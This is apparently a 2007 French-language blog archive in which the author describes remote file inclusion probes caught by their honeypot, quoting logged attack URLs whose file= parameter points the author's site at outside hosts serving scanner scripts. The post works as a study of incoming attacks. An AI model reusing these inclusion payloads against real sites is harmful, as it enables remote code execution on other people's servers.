Archive for November, 2007:
Remote File Inclusion Galore #2
Next, encore some weird stuff, un scout, beaucoup plus simple, probable que le bot prend, la réponse, et si la réponse aparait, sa veux dire que la page inclue les page externe sans la “Nuller” et exécute le code a l’interieur :
http://www.pure-chaos.org/index.php?file=http%3A%2F%2Fwww.scrappindancediva.com%2Fetoad%2Fmanufacturerimages%2F
hoq%2Fuxi%2F&nuked_nude=index&op=pdf&news_id=7
Le fichier :http://www.scrappindancediva.com/etoad/manufacturerimages/hoq/uxi/&nuked_nude=index&op=pdf&news_id=7
Read more »
Remote File Inclusion Galore .
Depuis quelque semaine, mes honeypot pogne plein de truc interessant, et je reçois des phishings scam, de plus en plus crédible et élaborer.
Today, un ptit remote file inclusion, pas encore identifier, c’est de toute évidence un “Scout” pour identifier des script vulnérable.
Voici l’URL, qui étais inclue de la maninère : http://www.pure-chaos.org/index.php?file=http://bondick.net/flashchat/nick_image/htaccess?
qui transfère automatiquement a :http://www.pure-chaos.org/?file=http://bondick.net/flashchat/nick_image/htaccess?
Le plus surprenant étant que l’hostname dans mes log est : iad-fw-global.amazon.com , je suis pas sur si c’est un bug de mon script de stat, ou si c’est simplement Amazon qui suis ce lien .
Update : Plutot weird, l’hostname d’Amazon, je suis encore a essayé de figurer, mais je crois que l’inclusion original vien de : fe27.hc.ru . Le Hostname de Amazon est probablement apparue a cause du “Smart link” que j’ai inclue, mais pour ce faire, faudrais que le lien se situe sur la page, ce qui est encore plus bizare ….
Vous trouverez le code PHP complet dans la suite :
